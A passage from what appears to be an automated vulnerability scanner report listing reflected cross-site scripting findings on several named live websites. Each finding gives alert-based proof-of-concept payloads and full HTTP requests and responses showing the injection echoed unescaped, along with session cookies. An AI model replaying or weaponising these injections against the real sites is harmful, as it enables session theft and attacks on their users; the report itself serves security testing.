.do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_propbae6e';alert(1)//ad3a1fe5923',
    {
               method:'GET',
               onComplete:parseXml
           });
}
function parseXml(response)
{
var responseXml = response.responseXML;
//alert(responseXml);
var m
...[SNIP]...

1.419. http://onlinecheckingsbanking.com/ [adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The value of the adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4a7"><script>alert(1)</script>c726bd08fb8 was submitted in the adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=947b717b071dadc68ba7dd3e56fcdf06; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 721
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8" "frameborder=0"/>
...[SNIP]...

1.420. http://onlinecheckingsbanking.com/ [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8916"><script>alert(1)</script>2d8d0fb1f0b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:45 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d460c720f7cd5ee81d00c4a5c9da894f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 714
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058" "frameborder=0"/>
...[SNIP]...

1.421. http://onlinecheckingsbanking.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b820e"><script>alert(1)</script>6f57152ba82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=cf6aa261be55b78f06bd6404dc8b066c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 733
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1" "frameborder=0"/>
...[SNIP]...

1.422. http://peoplesbank.com/search.php [term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesbank.com
Path:   /search.php

Issue detail

The value of the term request parameter is copied into the HTML document as plain text between tags. The payload 9183b<script>alert(1)</script>6fd4fa2c65b was submitted in the term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?d=peoplesbank.com&cachekey=1296747318&rc=true&term=Internet+banking9183b<script>alert(1)</script>6fd4fa2c65b&append= HTTP/1.1
Host: peoplesbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n94u5lhrbr0a5c7as50gdp2tc0;

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Cache-Control: no-cache
Content-type: text/html
Connection: close
Date: Thu, 03 Feb 2011 15:41:42 GMT
Server: lighttpd
Content-Length: 18861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="au
...[SNIP]...
<span class="searchedfor">INTERNET BANKING9183B<SCRIPT>ALERT(1)</SCRIPT>6FD4FA2C65B</span>
...[SNIP]...

1.423. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346ad'%3balert(1)//f0a82ea655a was submitted in the admeld_callback parameter. This input was echoed as 346ad';alert(1)//f0a82ea655a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match346ad'%3balert(1)//f0a82ea655a HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; subID="{}"; dp_rec="{\"1\": 1296659838+ \"3\": 1296659629+ \"2\": 1296508071+ \"4\": 1296660699}"; partnerUID="eyI4NCI6IFsiRFRRa2U3VDk5OVk0cVlKQiIsIHRydWVdfQ=="; segments="3391|13746|3392|23864|11262|11265|30353|7775|17277|3425|38781|38582,1298044270|27273|40657|24085|10102"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 03 Feb 2011 19:02:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 03-Feb-2011 19:02:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 368

document.write('<img width="0" height="0" src="http://tag.admeld.com/match346ad';alert(1)//f0a82ea655a?admeld_adprovider_id=300&external_user_id=82d726c3-44ee-407c-85c4-39a0b0fc11ef&Expiration=1297191762&custom_user_segments=%2C3391%2C13746%2C3392%2C23864%2C11262%2C11265%2C30353%2C7775%2C17277%2C3425%2
...[SNIP]...

1.424. http://pluck.local.com/ver1.0/daapi2.api [jpcb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.local.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpcb request parameter is copied into the HTML document as plain text between tags. The payload d5e7e<script>alert(1)</script>1fda4ce402e was submitted in the jpcb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcbd5e7e<script>alert(1)</script>1fda4ce402e&jpctx=request_0 HTTP/1.1
Host: pluck.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Thu, 03 Feb 2011 16:08:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Date: Thu, 03 Feb 2011 16:08:27 GMT
Content-Length: 91

PluckSDKjpcbd5e7e<script>alert(1)</script>1fda4ce402e({
"Envelopes": []
},'request_0');

1.425. http://pluck.local.com/ver1.0/daapi2.api [jpctx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluck.local.com
Path:   /ver1.0/daapi2.api

Issue detail

The value of the jpctx request parameter is copied into the HTML document as plain text between tags. The payload fa896<script>alert(1)</script>11222906e44 was submitted in the jpctx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/daapi2.api?jsonRequest=%7B%22Envelopes%22%3A%5B%5D%2C%22ObjectType%22%3A%22Requests.RequestBatch%22%7D&jpcb=PluckSDKjpcb&jpctx=request_0fa896<script>alert(1)</script>11222906e44 HTTP/1.1
Host: pluck.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Thu, 03 Feb 2011 16:08:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Date: Thu, 03 Feb 2011 16:08:45 GMT
Content-Length: 91

PluckSDKjpcb({
"Envelopes": []
},'request_0fa896<script>alert(1)</script>11222906e44');

1.426. http://pluckit.demandmedia.com/requests [apiKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the apiKey request parameter is copied into the HTML document as plain text between tags. The payload 3767e<script>alert(1)</script>480207bdcb8 was submitted in the apiKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 920
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:22 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:22 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorResponse\",\"isError\":true,\"TTL\":0,\"requestedBy\":\"\",\"message\":\"Unknown customer: c1e69f40-d871-4fed-8266-8c2fb07d10a73767e<script>alert(1)</script>480207bdcb8\",\"id\":\"4744580d-ffc5-418f-8c03-776a210129be\"}"},{"objectType":"Core.ResponseEnvelope","payloadType":"Util.ErrorResponse","payload":"{\"objectType\":\"Util.ErrorResponse\",\"isError\":true,\"TTL\"
...[SNIP]...

1.427. http://pluckit.demandmedia.com/requests [jsonpCallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the jsonpCallback request parameter is copied into the HTML document as plain text between tags. The payload 546ff<script>alert(1)</script>aa268e625b5 was submitted in the jsonpCallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5&jsonpContext=request_442381374318&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=cff8d33d-b33f-4e84-83eb-d9f6a41823a1; BIGipServerPluckit2.Webpool-80=908461834.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: public, must-revalidate
Pragma: PluckOnDemandApiRev=7315
Content-Length: 4368
Content-Type: application/json; charset=utf-8
Expires: Thu, 03 Feb 2011 19:03:26 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml?apiKey=00000000-0000-0000-0000-000000000000", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 03 Feb 2011 19:03:25 GMT

dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback546ff<script>alert(1)</script>aa268e625b5({"Envelopes":[{"objectType":"Core.ResponseEnvelope","payloadType":"Customers.GetCustomerResponse","payload":"{\"objectType\":\"Customers.GetCustomerResponse\",\"isError\":false,\"TTL\":0,\"requestedBy
...[SNIP]...

1.428. http://pluckit.demandmedia.com/requests [jsonpContext parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pluckit.demandmedia.com
Path:   /requests

Issue detail

The value of the jsonpContext request parameter is copied into the HTML document as plain text between tags. The payload 6b2fe<script>alert(1)</script>7d41626bf96 was submitted in the jsonpContext parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /requests?apiKey=c1e69f40-d871-4fed-8266-8c2fb07d10a7&jsonpCallback=dmpod.RequestServiceInstances['pluckit_140100923442'].jsonpCallback&jsonpContext=request_4423813743186b2fe<script>alert(1)</script>7d41626bf96&jsonRequest=%7B%22Envelopes%22%3A%5B%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Customers.GetCustomerRequest%22%2C%22payload%22%3A%22%7B%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Customers.GetCustomerRequest%5C%22%7D%22%7D%2C%7B%22callerSDK%22%3A%22js%3A7315%22%2C%22objectType%22%3A%22Core.RequestEnvelope%22%2C%22payloadType%22%3A%22Content.GetRelatedAdLinksRequest%22%2C%22payload%22%3A%22%7B%5C%22pageUrl%5C%22%3A%5C%22http%3A//mortgage.ocregister.com/%5C%22%2C%5C%22callerSDK%5C%22%3A%5C%22js%3A7315%5C%22%2C%5C%22objectType%5C%22%3A%5C%22Content.GetRelatedAdLinksRequest%5C%22%2C%5C%22searchTerm%5C%22%3A%5C%22%5C%22%2C%5C%22returnQueryParams%5C%22%3A%5C%22%5C%22%2C%5C%22reportingDomain%5C%22%3A%5C%22%5C%22%2C%5C%22numberOfSearchLinks%5C%22%3A%5C%225%5C%22%2C%5C%22numberOfResultLinks%5C%22%3A%5C%225%5C%22%2C%5C%22tagsProvider%5C%22%3A%5C%22%5C%22%2C%5C%22matchMethod%5C%22%3A%5C%22smoothedkeywords%5C%22%2C%5C%22articlesTaken%5C%22%3A%5C%2210%5C%22%2C%5C%22articlesThreshold%5C%22%3A%5C%223%5C%22%7D%22%7D%5D%2C%22returnDiagnostics%22%3Afalse%2C%22executeMethod%22%3A%22ExecuteAll%22%2C%22callerSDK%22%3A%22js%3A7315%22%7D HTTP/1.1
Host: pluckit.demandmedia.com
Proxy-Connection: keep-alive
Referer: http://mortgage.ocregister.com/feeda71cd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E1f35e8c0ea2/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
